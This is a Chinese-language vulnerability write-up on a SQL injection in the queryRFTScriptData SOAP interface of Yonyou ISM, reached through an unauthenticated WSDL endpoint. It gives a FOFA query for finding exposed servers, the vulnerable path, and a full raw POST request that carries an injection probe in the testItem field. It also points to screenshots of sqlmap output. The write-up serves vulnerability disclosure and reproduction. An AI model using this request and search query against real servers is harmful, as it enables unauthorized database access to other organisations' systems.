登录 白背景

用友ism queryRFTScriptData参数存在SQL注入漏洞

一、漏洞简介

用友ism存在wsdl未授权接口信息泄露,对wsdl进行解析xml,发现/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl接口中的queryRFTScriptData参数存在sql注入漏洞。

二、影响版本

  • 用友ism

三、资产测绘

  • fofaapp="用友-ism"

image.png

  • 特征

image.png

四、漏洞复现

未授权接口

/uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService?wsdl

image.png
testItem参数存在sql注入

POST /uapws/service/nc.itf.sdp.web.autotest.IAutoTestWebService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=CD455D10BBE0F87FB8D6D6CEED880D58.server
Upgrade-Insecure-Requests: 1
SOAPAction: urn:queryRFTScriptData
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 739

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iaut="http://autotest.web.sdp.itf.nc/IAutoTestWebService">
   <soapenv:Header/>
   <soapenv:Body>
      <iaut:queryRFTScriptData>
         <queryInfo>
            <!--type: string-->
            <testItem>gero et'</testItem>
            <!--type: string-->
            <moduleName>sonoras imperio</moduleName>
            <!--type: string-->
            <versionCode>quae divum incedo</versionCode>
            <!--type: string-->
            <devfield>verrantque per auras</devfield>
            <!--type: string-->
            <testerCode>per auras</testerCode>
         </queryInfo>
      </iaut:queryRFTScriptData>
   </soapenv:Body>
</soapenv:Envelope>

image.png
sqlmap
image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/cbghg2dgwi8ibm7y